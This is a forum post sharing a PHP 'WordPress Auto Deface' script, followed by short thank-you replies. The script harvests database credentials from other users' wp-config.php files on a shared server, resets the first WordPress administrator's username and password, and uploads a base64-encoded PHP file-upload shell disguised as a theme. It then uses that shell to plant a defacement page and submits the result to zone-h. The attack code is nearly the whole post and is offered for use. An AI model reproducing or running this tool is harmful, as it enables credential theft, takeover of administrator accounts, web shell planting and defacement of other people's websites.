Wordpress Auto Deface

<?php
//how to use : https://www.youtube.com/watch?v=q72Rp8QM4xI
//Tu5b0l3d
//IndoXploit
//http://indoxploit.blogspot.com/ - linuxsec.org
error_reporting(0);
$zh = "Trenggalek Cyber Army"; // zone-h nick
$jembut = "hebr0n"; // add username wordpress
$jembut2 = "hebr0n"; // add password wordpress
$kontol = "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by Trenggalek 6etar<p style='color: transparent'><title>Hacked by Trenggalek 6etar</title>"; // script deface
echo "<body bgcolor=black>";
echo "<font color=green>";
echo "<title>WP Auto Hek</title>";
cover("IndoXploit");

function save($data){
        $fp = @fopen("indo.htm", "a") or die("cant open file");
        fwrite($fp, $data);
        fclose($fp);
}

function anucurl($sites){
        $ch1 = curl_init ("$sites");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch1);
return $data;
    }

function lohgin($cek, $web, $userr, $pass){
        $post = array(
                    "log" => "$userr",
                    "pwd" => "$pass",
                    "rememberme" => "forever",
                    "wp-submit" => "Log In",
                    "redirect_to" => "$web/wp-admin/",
                    "testcookie" => "1",
                    );
$ch = curl_init ("$cek");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data6 = curl_exec ($ch);
return $data6;
    }

function cover($indoXploit){
    echo "<center><font size='5px'> WordPress Auto Deface Coded by $indoXploit</font><br>";
    echo "Deface Result : <a href='indo.htm' style='text-decoration: none'>indo.htm</a></center><br><br><br>";
}

function ambilKata($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}


$a = file_get_contents('/etc/passwd');
    preg_match_all('/(.*?):x:/', $a, $data);
    foreach($data[1] as $user){
$baca = file_get_contents("/home/$user/public_html/wp-config.php");
 
 /* symlink('/home/'.$user.'/public_html/wp-config.php',$user.'- config.txt');  */

if($baca!=""){
    

/* $b = `cp /home/$user/public_html/index.php $user-index.txt`; */

$file1 = "$user-config.txt";
$fp2 = fopen($file1,"w");
fputs($fp2,$baca);

$file = @file_get_contents($file1);


echo $user."-> sukses<br>";
                    $host = ambilkata($file,"DB_HOST', '","'");
                    $username = ambilkata($file,"DB_USER', '","'");
                    $password = ambilkata($file,"DB_PASSWORD', '","'");
                    $db = ambilkata($file,"DB_NAME', '","'");
                    $dbprefix = ambilkata($file,"table_prefix  = '","'");
                    $user_baru = $jembut;
                    $password_baru = $jembut2;
                    $prefix = $db.".".$dbprefix."users";
                    $sue = $db.".".$dbprefix."options";
                    $pass = md5("$password_baru");
                    $nick = $kontol;

echo "# Db Host: $host<br>";
echo "# Db user: $username<br>";
echo "# Db Password: $password<br>";
echo "# Db name: $db<br>";
echo "# Table_Prefix: $dbprefix<br>";

mysql_connect($host,$username,$password);

        mysql_select_db($db);

        $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
           $r=mysql_fetch_array($tampil);
        $id = $r[ID];

        $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
           $r2=mysql_fetch_array($tampil2);
        $target = $r2[option_value];
         echo "# $target<br>";
        

         mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");

$site= "$target/wp-login.php";
$site2= "$target/wp-admin/theme-install.php?upload";
$a = lohgin($site, $target, $user_baru, $password_baru);
$b = lohgin($site2, $target, $user_baru, $password_baru);
            

$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
echo "# token -> $anu2<br>";


$upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");

$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);

$c = file_get_contents($w);
    
  $post2 = array(
                    "_wpnonce" => "$anu2",
                    "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
                    "themezip" => "@m.php",
                    "install-theme-submit" => "Install Now",
                    );
$ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);

$namafile = "wew.php";
$fp2 = fopen($namafile,"w");
fputs($fp2,$nick);

$y = date("Y");
$m = date("m");


$ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS,
array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
$postResult = curl_exec($ch6);
curl_close($ch6);

$as = "$target/k.php";
$bs = file_get_contents($as);
 if(preg_match("#hacked#si",$bs)){
                        echo "[+] <font color='cyan'>Deface success..<br>";
                        echo "[+] $as<br>";
                        save($as."<br>");
                        echo "[+] zone-h: ";
                        $ch3 = curl_init ("http://www.zone-h.com/notify/single");
                        curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt ($ch3, CURLOPT_POST, 1);
                        curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$as&hackmode=1&reason=1");
                        
        if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
                echo  " Ok  <br><br>";
        }else{
                echo " No <br><br></font>";}
                    }
                    else{
                        echo "[!] <font color='red'>Deface Failed..<br>";
                        echo "[!] Try manual deface at : <br>";
                        echo "[!] $target/wp-login.php<br>";
                        echo "[!] username: $user_baru<br>";
                        echo "[!] password: $password_baru<br><br><br></font>";

                      
                    }
    }
else{
    echo "$user <= No<br>";
}
}
?>

 

Thanks bro

 

 

Good Share I know it

 

Hehe ,
I think this forum to be very nice with a design like this

 

good like it

 

Thanks

 

welcome boss

 

good like it

 

eline sağlık